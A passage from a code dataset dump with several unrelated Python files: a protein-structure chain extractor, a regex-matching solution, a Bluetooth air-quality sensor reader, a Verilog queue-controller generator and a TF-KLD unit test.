\"C1'\":\r\n\t\t\t\t\t\t\tnewfile.write(line)\r\n\r\n\t\t\t\toldfile.close()\r\n\t\t\t\tnewfile.close()\r\n\r\n\t\t# This portion is for cif files\r\n\t\telse:\r\n\t\t\tfor j in RNAproteins_dict[chain]:\r\n\r\n\t\t\t\t# Generate the input and output files\r\n\t\t\t\tinput_filename = chain + \".cif\"\r\n\t\t\t\toutput_filename = \"Extract_cif_\" + chain + \"_\" + j + \".pdb\"\r\n\r\n\t\t\t\t# Input and output path\r\n\t\t\t\tinput_path = os.path.join(main_folder, input_folder, input_filename)\r\n\t\t\t\toutput_path = os.path.join(main_folder, output_folder, output_filename)\r\n\r\n\t\t\t\toldfile = open(input_path, \"r\")\r\n\t\t\t\tnewfile = open(output_path,\"w\")\r\n\r\n\t\t\t\t# Extract the residue lines\r\n\t\t\t\tfor line in oldfile:\r\n\t\t\t\t\tif line:\r\n\t\t\t\t\t\tif line[0:4] == \"ATOM\" and j in line[90:95].split(\" \") and line[18:21] == \"C1'\":\r\n\t\t\t\t\t\t\tnewfile.write(line)\r\n\r\n\t\t\t\toldfile.close()\r\n\t\t\t\tnewfile.close()\r\n\r\n\t# This portion for missing pdb files\r\n\telse:\r\n\t\toutput_filename = \"Missing_\" + chain + \".pdb\"\r\n\t\tnewfile = open(output_filename,\"w\")\r\n\t\tnewfile.close()\r\n\r\nprint(\"Extraction complete ...\")","sub_path":"01-Download-and-extract/02-Processed-PDB-files/01 Extract chain information C1-C1.py","file_name":"01 Extract chain information C1-C1.py","file_ext":"py","file_size_in_byte":3346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"428406400","text":"#!/usr/bin/env python\n\n# '.' Matches any single character.\n# '*' Matches zero or more of the preceding element.\n#\n# The matching should cover the entire input string (not partial).\n#\n# The function prototype should be:\n# bool isMatch(const char *s, const char *p)\n\nclass Solution(object):\n def match(self, s, si, p, pi):\n def charMatch(s, si, p, pi):\n try:\n return p[pi] in (s[si], '.')\n except:\n return False\n\n def starMatch(t, s, si, p, pi):\n return self.match(s, si, p, pi) or (charMatch(s, si, t, 0) and starMatch(t, s, si+1, p, pi))\n\n if si == len(s) and pi == len(p):\n return True\n\n if pi+1 < len(p) and p[pi+1] == '*':\n return starMatch(p[pi], s, si, p, pi+2)\n if charMatch(s, si, p, pi):\n return self.match(s, si+1, p, pi+1)\n return False\n\n def real_pattern(self, p):\n index = 0\n real_pattern_list = []\n prev_glob_char = None\n\n while index < len(p):\n if index+1 < len(p) and p[index+1] == '*':\n if prev_glob_char != p[index]:\n prev_glob_char = p[index]\n real_pattern_list.append(p[index:index+2])\n index += 2\n else:\n prev_glob_char = None\n real_pattern_list.append(p[index])\n index += 1\n\n return ''.join(real_pattern_list)\n\n def isMatch(self, s, p):\n \"\"\"\n :type s: str\n :type p: str\n :rtype: bool\n \"\"\"\n return self.match(s, 0, self.real_pattern(p), 0)\n","sub_path":"10.Regular_Expression_Matching.py","file_name":"10.Regular_Expression_Matching.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"128963347","text":"import binascii\nimport struct\nfrom bluepy import btle\n\n\nclass EmoPlus:\n\n service_battery_uuid = \"0000180f-0000-1000-8000-00805f9b34fb\"\n service_pm2dot5_uuid = \"0000fff0-0000-1000-8000-00805f9b34fb\"\n \n def __init__(self, addr):\n self.addr = addr\n self.conn = btle.Peripheral()\n self.connected = False\n \n def connect(self):\n try:\n self.conn.connect(self.addr)\n self.connected = True\n\n self.service_battery = self.conn.getServiceByUUID(self.service_battery_uuid)\n self.service_pm2dot5 = self.conn.getServiceByUUID(self.service_pm2dot5_uuid)\n except btle.BTLEException as e:\n raise RuntimeError(e)\n \n def disconnect(self):\n self.conn.disconnect()\n self.connected = False\n \n def get_battery_level(self):\n try:\n battery_ch = self.service_battery.getCharacteristics(forUUID='00002a19-0000-1000-8000-00805f9b34fb')[0]\n value = battery_ch.read()\n return struct.unpack('B', value)[0]\n except btle.BTLEException as e:\n raise RuntimeError(e)\n \n def warm_up(self):\n try:\n cmd_ch = self.service_pm2dot5.getCharacteristics(forUUID='0000fff3-0000-1000-8000-00805f9b34fb')[0]\n value = cmd_ch.read()\n except btle.BTLEException as e:\n raise RuntimeError(e)\n\n def get_haze_value(self):\n \n try:\n value_ch = self.service_pm2dot5.getCharacteristics(forUUID='0000fff2-0000-1000-8000-00805f9b34fb')[0]\n \n value = value_ch.read()\n print('value=%s' % binascii.b2a_hex(value))\n \n c1 = bytes(value[10:12])\n c2 = bytes(value[12:14])\n print('c1=%s, c2=%s' % (binascii.b2a_hex(c1), binascii.b2a_hex(c2)))\n \n a = struct.unpack('B', c1[1:])[0]\n b = struct.unpack('B', c1[:1])[0]\n density = int((b << 8) | (a & 0xff)) * 1.265\n\n a = struct.unpack('B', c2[1:])[0]\n b = struct.unpack('B', c2[:1])[0]\n count = (int((a & 0xff) << 0) + int((b & 0xff) << 8)) * 2.56\n if count < 0:\n count = 0\n\n print('%d ug/m3, %d 0.3um' % (density, count))\n return count, density\n \n except btle.BTLEException as e:\n raise RuntimeError(e)\n","sub_path":"emo_plus.py","file_name":"emo_plus.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"213852906","text":"from veriloggen import *\n\nfrom common.make_fifo import make_fifo\n\n\ndef make_output_queue_controller(conf_receiver):\n m = Module('fdam_output_queue_controller')\n ID_QUEUE = m.Parameter('ID_QUEUE', 0)\n ADDR_WIDTH = m.Parameter('ADDR_WIDTH', 64)\n QTD_WIDTH = m.Parameter('QTD_WIDTH', 32)\n DATA_WIDTH = m.Parameter('DATA_WIDTH', 512)\n CONF_ID_QUEUE_WIDTH = m.Parameter('CONF_ID_QUEUE_WIDTH', 32)\n TAG_WIDTH = m.Parameter('TAG_WIDTH', 16)\n\n clk = m.Input('clk')\n rst = m.Input('rst')\n start = m.Input('start')\n\n conf_valid = m.Input('conf_valid', 2)\n conf = m.Input('conf', EmbeddedCode('ADDR_WIDTH + QTD_WIDTH + CONF_ID_QUEUE_WIDTH'))\n\n available_write = m.Input('available_write')\n has_wr_peding = m.OutputReg('has_wr_peding')\n request_write = m.OutputReg('request_write')\n write_data = m.OutputReg('write_data', DATA_WIDTH + ADDR_WIDTH + TAG_WIDTH)\n\n write_data_valid = m.Input('write_data_valid')\n write_queue_id = m.Input('write_queue_id', TAG_WIDTH)\n\n acc_user_available_write = m.Output('acc_user_available_write')\n acc_user_request_write = m.Input('acc_user_request_write')\n acc_user_write_data = m.Input('acc_user_write_data', DATA_WIDTH)\n acc_user_done = m.Input('acc_user_done')\n\n done = m.OutputReg('done')\n\n FIFO_DEPTH_BITS = m.Localparam('FIFO_DEPTH_BITS', 10)\n FIFO_FULL = m.Localparam('FIFO_FULL', EmbeddedCode('2 ** FIFO_DEPTH_BITS'))\n CONF_TYPE_OUT_DATA = m.Localparam('CONF_TYPE_OUT_DATA', 2)\n\n conf_ready = m.Reg('conf_ready')\n addr_base = m.Reg('addr_base', ADDR_WIDTH)\n addr_write_next = m.Reg('addr_write_next', ADDR_WIDTH)\n qtd_data_cl = m.Reg('qtd_data_cl', QTD_WIDTH)\n count_req_cl = m.Reg('count_req_cl', QTD_WIDTH)\n count_req_cl_align = m.Reg('count_req_cl_align', QTD_WIDTH)\n count_cl = m.Reg('count_cl', QTD_WIDTH)\n write_peding = m.Reg('write_peding', 16)\n flag_addr_init = m.Reg('flag_addr_init')\n fifo_re = m.Reg('fifo_re')\n issue_req_data = m.Wire('issue_req_data')\n fifo_empty = m.Wire('fifo_empty')\n fifo_count = m.Wire('fifo_count', FIFO_DEPTH_BITS + 1)\n fifo_full = m.Wire('fifo_full')\n fifo_almostfull = m.Wire('fifo_almostfull')\n fifo_almostempty = m.Wire('fifo_almostempty')\n write_data_valid_queue = m.Wire('write_data_valid_queue')\n fifo_dout_valid = m.Wire('fifo_dout_valid')\n fifo_dout = m.Wire('fifo_dout', DATA_WIDTH)\n end_req_wr_data = m.Wire('end_req_rd_data')\n conf_rd_valid = m.Wire('conf_rd_valid')\n conf_rd = m.Wire('conf_rd', EmbeddedCode(ADDR_WIDTH + QTD_WIDTH + CONF_ID_QUEUE_WIDTH))\n rst_internal = m.Wire('rst_internal')\n align_write_data = m.Wire('align_write_data')\n\n params = [('CONF_TYPE', CONF_TYPE_OUT_DATA), ('CONF_ID', ID_QUEUE), ('CONF_ID_WIDTH', CONF_ID_QUEUE_WIDTH),\n ('CONF_WIDTH', EmbeddedCode('ADDR_WIDTH + QTD_WIDTH + CONF_ID_QUEUE_WIDTH'))]\n con = [('clk', clk), ('rst', rst), ('conf_in_valid', conf_valid), ('conf_in_data', conf),\n ('conf_out_valid', conf_rd_valid),\n ('conf_out_data', conf_rd), ('conf_reset_out', rst_internal)]\n m.Instance(conf_receiver, 'conf_receiver', params, con)\n\n fifo = make_fifo()\n params = [('FIFO_WIDTH', DATA_WIDTH), ('FIFO_DEPTH_BITS', FIFO_DEPTH_BITS),\n ('FIFO_ALMOSTFULL_THRESHOLD', FIFO_FULL - 4), ('FIFO_ALMOSTEMPTY_THRESHOLD', 2)]\n con = [('clk', clk), ('rst', rst_internal), ('we', acc_user_request_write), ('din', acc_user_write_data),\n ('re', fifo_re), ('valid', fifo_dout_valid), ('dout', fifo_dout), ('count', fifo_count),\n ('empty', fifo_empty), ('full', fifo_full), ('almostfull', fifo_almostfull),\n ('almostempty', fifo_almostempty)]\n m.Instance(fifo, 'fifo', params, con)\n\n end_req_wr_data.assign((count_req_cl >= qtd_data_cl))\n issue_req_data.assign(AndList(start & conf_ready & ~end_req_wr_data & available_write,\n Mux(fifo_almostempty, (~fifo_empty & ~fifo_re), Int(1, 1, 2))))\n acc_user_available_write.assign(~fifo_almostfull)\n write_data_valid_queue.assign(AndList(write_data_valid, (write_queue_id == ID_QUEUE)))\n align_write_data.assign(\n AndList(fifo_empty, acc_user_done, ~acc_user_request_write, (count_req_cl_align[0] | count_req_cl_align[1])))\n\n m.Always(Posedge(clk))(\n If(rst_internal)(\n done(Int(0, 1, 2)),\n has_wr_peding(Int(0, 1, 2))\n ).Else(\n done(AndList((count_cl >= qtd_data_cl), start, conf_ready)),\n has_wr_peding(Mux(write_peding > 0, Int(1, 1, 2), Int(0, 1, 2)))\n )\n )\n\n m.Always(Posedge(clk))(\n If(rst_internal)(\n addr_base(0),\n qtd_data_cl(0),\n conf_ready(Int(0, 1, 2)),\n ).Else(\n If(conf_rd_valid)(\n conf_ready(Int(1, 1, 2)),\n qtd_data_cl(conf_rd[CONF_ID_QUEUE_WIDTH:CONF_ID_QUEUE_WIDTH + QTD_WIDTH]),\n addr_base(conf_rd[CONF_ID_QUEUE_WIDTH + QTD_WIDTH:CONF_ID_QUEUE_WIDTH + QTD_WIDTH + ADDR_WIDTH]),\n )\n )\n )\n\n m.Always(Posedge(clk))(\n If(rst_internal)(\n addr_write_next(0),\n flag_addr_init(Int(1, 1, 2))\n ).Else(\n If(conf_ready & flag_addr_init)(\n addr_write_next(addr_base),\n flag_addr_init(Int(0, 1, 2))\n ).Elif(fifo_dout_valid | align_write_data)(\n addr_write_next(addr_write_next + 1)\n )\n )\n )\n\n m.Always(Posedge(clk))(\n If(rst_internal)(\n count_cl(0),\n ).Else(\n If(write_data_valid_queue)(\n count_cl(count_cl + 4)\n )\n )\n )\n\n m.Always(Posedge(clk))(\n If(rst_internal)(\n fifo_re(Int(0, 1, 2)),\n count_req_cl(0),\n count_req_cl_align(0)\n ).Else(\n fifo_re(Int(0, 1, 2)),\n If(issue_req_data)(\n fifo_re(Int(1, 1, 2)),\n count_req_cl(count_req_cl + 1),\n count_req_cl_align(count_req_cl_align + 1)\n ).Elif(align_write_data & ~fifo_dout_valid)(\n count_req_cl(count_req_cl + 1),\n count_req_cl_align(count_req_cl_align + 1)\n )\n )\n )\n\n m.Always(Posedge(clk))(\n If(rst_internal)(\n write_peding(0)\n ).Else(\n Case(Cat(write_data_valid_queue, (fifo_dout_valid | align_write_data)))(\n When(Int(0, 2, 10))(\n write_peding(write_peding)\n ),\n When(Int(1, 2, 10))(\n write_peding(write_peding + 1)\n ),\n When(Int(2, 2, 10))(\n write_peding(write_peding - 4)\n ),\n When(Int(3, 2, 10))(\n write_peding(write_peding - 3)\n )\n )\n )\n )\n\n m.Always(Posedge(clk))(\n If(rst_internal)(\n request_write(Int(0, 1, 2)),\n ).Else(\n request_write(Int(0, 1, 2)),\n If(fifo_dout_valid | align_write_data)(\n request_write(Int(1, 1, 2))\n )\n )\n )\n m.Always(Posedge(clk))(\n write_data(Cat(fifo_dout, addr_write_next, ID_QUEUE[0:TAG_WIDTH]))\n )\n\n return m\n\n# make_output_queue_controller().to_verilog('output_queue_controller_test')\n","sub_path":"fdam-hw-generator/src/fdam_acc/make_output_queue_controller.py","file_name":"make_output_queue_controller.py","file_ext":"py","file_size_in_byte":7368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"237131709","text":"\nimport unittest\nimport random\n\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport lorem\nfrom tqdm import tqdm\n\nfrom tfkld import _get_counts, _kld, _apply_weight\n\n\ndef _test_counts(p1, p2, labels):\n \"\"\"\n Runs original slow python code\n \"\"\"\n nrows, ncols = p1.shape\n count = np.ones((4, ncols))\n for row in tqdm(range(nrows)):\n label = labels[row]\n for d in range(ncols):\n if ((p1[row, d] > 0.) and (p2[row, d] == 0.)) \\\n or ((p1[row, d] == 0.) and (p2[row, d] > 0.)):\n if label == 0:\n count[0, d] += 1.0\n elif label == 1:\n count[2, d] += 1.0\n elif (p1[row, d] > 0) and (p2[row, d] > 0):\n if label == 0:\n count[1, d] += 1.0\n elif label == 1:\n count[3, d] += 1.0\n return count\n\n\ndef _test_kld(counts, smoothing):\n # smoothing\n counts += smoothing\n # normalize\n pattern = [[1, 1, 0, 0], [1, 1, 0, 0], [0, 0, 1, 1], [0, 0, 1, 1]]\n pattern = np.array(pattern)\n prob = counts / (pattern.dot(counts))\n # kl\n ratio = np.log((prob[0:2, :] / prob[2:4, :]) + 1e-7)\n weight = (ratio * prob[0:2, :]).sum(axis=0)\n return weight\n\n\nclass TestTFKLD(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n p1, p2, labels = [], [], []\n for _ in range(100):\n p1.append(lorem.sentence())\n p2.append(lorem.sentence())\n labels.append(random.randint(0, 1))\n\n vec = CountVectorizer(dtype=np.float).fit(p1 + p2)\n cls.p1, cls.p2 = vec.transform(p1), vec.transform(p2)\n cls.labels = np.array(labels)\n\n def test_counting(self):\n labels, p1, p2 = TestTFKLD.labels, TestTFKLD.p1, TestTFKLD.p2\n\n print(\"Testing counting...\")\n counts1 = _get_counts(p1, p2, labels)\n counts2 = _test_counts(p1, p2, labels)\n self.assertTrue(np.all(counts1 == counts2), \"Counting methods\")\n\n print(\"Testing weight\")\n weight1 = _kld(counts1, 0.05)\n weight2 = _test_kld(counts2, 0.05)\n self.assertTrue(np.allclose(weight1, weight2), \"Weight methods\")\n\n print(\"Testing weighting\")\n # transform using fast method\n weighted1 = _apply_weight(weight1, p1)\n # transform using original method (row-wise)\n weighted2 = p1.copy()\n for i in range(weighted2.shape[0]):\n weighted2[i, :] = weighted2[i, :].multiply(weight2)\n\n self.assertTrue(np.allclose(weighted1.todense(), weighted2.todense()),\n \"Weighted results\")\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}